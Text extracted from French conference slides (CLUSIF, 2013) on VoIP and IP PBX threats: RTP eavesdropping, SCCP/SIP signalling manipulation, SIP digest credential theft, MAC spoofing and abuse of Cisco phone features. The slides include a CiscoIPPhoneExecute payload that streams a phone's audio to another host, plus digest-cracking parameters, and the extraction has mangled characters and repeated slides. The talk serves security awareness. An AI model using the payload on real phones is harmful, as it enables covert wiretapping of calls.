Les *menaces en image* Joffrey CZARNY - EADS IW CLUSIF > PABX IP et la sécurité 25 Avril 2013
Les menaces abordées aujourd hui Ecoute des communica>ons téléphoniques Manipula>on des flux de signalisa>on v SCCP (redirecfon d appels) v SIP (vol d idenffiant) Ecoute des échanges téléphoniques externes Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC Abus des fonc>onnalités d un téléphone IP 2
Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3
Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3
Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3
Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3
ManipulaFon des flux de signalisafon 5
manipulafon des flux de signalisafon Python Skinny class from Scapy # Station - > Callmanager 0x0000: "SkinnyMessageKeepAlive", 0x0001: "SkinnyMessageRegister", 0x0002: "SkinnyMessageIpPort", 0x0003: "SkinnyMessageKeypadButton", 0x0004: "SkinnyMessageEnblocCall", 0x0005: "SkinnyMessageStimulus", 0x0006: "SkinnyMessageOffHook", 0x0007: "SkinnyMessageOnHook", 0x0008: "SkinnyMessageHookFlash", 0x0009: "SkinnyMessageForwardStatReq", 0x000A: "SkinnyMessageSpeedDialStatReq", 0x000B: "SkinnyMessageLineStatReq", 0x000C: "SkinnyMessageConfigStatReq", 0x000D: "SkinnyMessageTimeDateReq", 0x000E: "SkinnyMessageButtonTemplateReq", 0x000F: "SkinnyMessageVersionReq", 0x0010: "SkinnyMessageCapabilitiesRes", 0x0011: "SkinnyMessageMediaPortList", 0x0012: "SkinnyMessageServerReq, 5
manipulafon des flux de signalisafon CLUSIF > Conférence > Lieu Date 5
Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP INVITE 200 OK 7
Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP BYE 200 OK 8
Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP BYE 407 Challenge 9
Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP 10
Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP HA1 = MD5(username:realm:password) HA2 = MD5(method:digestURI) response = MD5(HA1:nonce:HA2) >>> username='100' >>> realm='asterisk' >>> password='test' >>> method='register' >>> uri='sip:10.100.100.127' 11
Ecoute des échanges téléphoniques externes Les passerelles VoIP ne sont pas de simple routeur Les flux de signalisa>on et voix ne sont quasiment jamais chiffrés par rapport au flux interne à l éco système VoIP. Les protocoles de signalisa>on sur les passerelles VoIP n u>lisent pas d iden>fiants 12
Ecoute des échanges téléphoniques externe 13
Ecoute des échanges téléphoniques externe 14
Ecoute des échanges téléphoniques externe 15
Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC Les téléphones VoIP Cisco utilisent la MAC@ comme identifiant. Avec un émulateur de téléphone VoIP Cisco, il est possible d usurper l identité d une personne au sein de l éco système VoIP. 16
Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 17
Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 18
Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 18
Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19
Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19
Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19
Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19
20
20
QuesFons / Responses Allo?? Quoi t as pas sécurisé ton infra VoIP?? Allo?? 21